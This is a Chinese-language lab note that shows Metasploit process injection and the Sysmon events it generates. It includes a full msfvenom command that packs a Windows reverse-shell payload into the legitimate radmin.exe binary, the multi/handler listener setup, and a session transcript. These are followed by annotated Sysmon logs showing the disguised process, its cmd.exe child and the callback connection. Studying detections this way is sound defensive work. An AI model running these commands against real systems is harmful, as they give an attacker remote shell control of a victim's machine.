metasploit进程注入 sysmon事件采集示例
生成payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
靶机运行r2admin,并在攻击机用msfconsole接收反弹shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 9876
lport => 9876
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:9876
[*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400
pwd
pwd
'pwd' �����ڲ����ⲿ���Ҳ���ǿ����еij���
�������ļ���
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely我自己根据上述方法的操作截图:
我们看看进程注入成功后产生了3条事件:
Process Create:
RuleName: -
UtcTime: 2022-04-21 07:10:32.488
ProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ProcessId: 1988
Image: C:\Users\76194\meter.exe ==》路径是恶意的文件名
FileVersion: 3, 0, 0, 1
Description: Radmin Viewer ==》但是文件描述啥的都是使用的radmin的
Product: Radmin Viewer
Company: Famatech, Inc. ==》公司啥的也是
OriginalFileName: Radmin.exe ==》original 文件名也是!!!由此看,msf的进程注入就是假借了一个壳啊!!!????
CommandLine: meter.exe ==》命令行运行
CurrentDirectory: C:\Users\76194\
User: DESKTOP-UKAQ1J3\76194
LogonGuid: {f7ee4450-f98e-6260-0327-030000000000}
LogonId: 0x32703
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=7D7D702AE3DD202C691DE6C53D6EC09B,SHA256=4BC01EAF72B2651729D39B5A94BA6969D31A0DEF194467411852C063A069CAFA,IMPHASH=B57FE998F1E11811F80ABFD6E10DCF47
ParentProcessGuid: {f7ee4450-fb48-6260-9900-000000000500}
ParentProcessId: 5320
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"
ParentUser: DESKTOP-UKAQ1J3\76194
Process Create:
RuleName: -
UtcTime: 2022-04-21 07:10:32.530
ProcessGuid: {f7ee4450-0368-6261-1501-000000000500}
ProcessId: 428
Image: C:\Windows\SysWOW64\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd
CurrentDirectory: C:\Users\76194\
User: DESKTOP-UKAQ1J3\76194
LogonGuid: {f7ee4450-f98e-6260-0327-030000000000}
LogonId: 0x32703
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
ParentProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ParentProcessId: 1988
ParentImage: C:\Users\76194\meter.exe ==》这个说明是在子进程里创建了cmd.exe,供反弹shell使用
ParentCommandLine: meter.exe
ParentUser: DESKTOP-UKAQ1J3\76194
Network connection detected:
RuleName: Usermode
UtcTime: 2022-04-21 07:10:32.520
ProcessGuid: {f7ee4450-0368-6261-1401-000000000500}
ProcessId: 1988
Image: C:\Users\76194\meter.exe ==》反弹shell的联网事件
User: DESKTOP-UKAQ1J3\76194
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.168.138
SourceHostname: DESKTOP-UKAQ1J3
SourcePort: 57194
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.168.96 ==》这个是我的msf远控机器
DestinationHostname: -
DestinationPort: 8800
在反弹shell里执行一条whoami命令:
其父进程是cmd
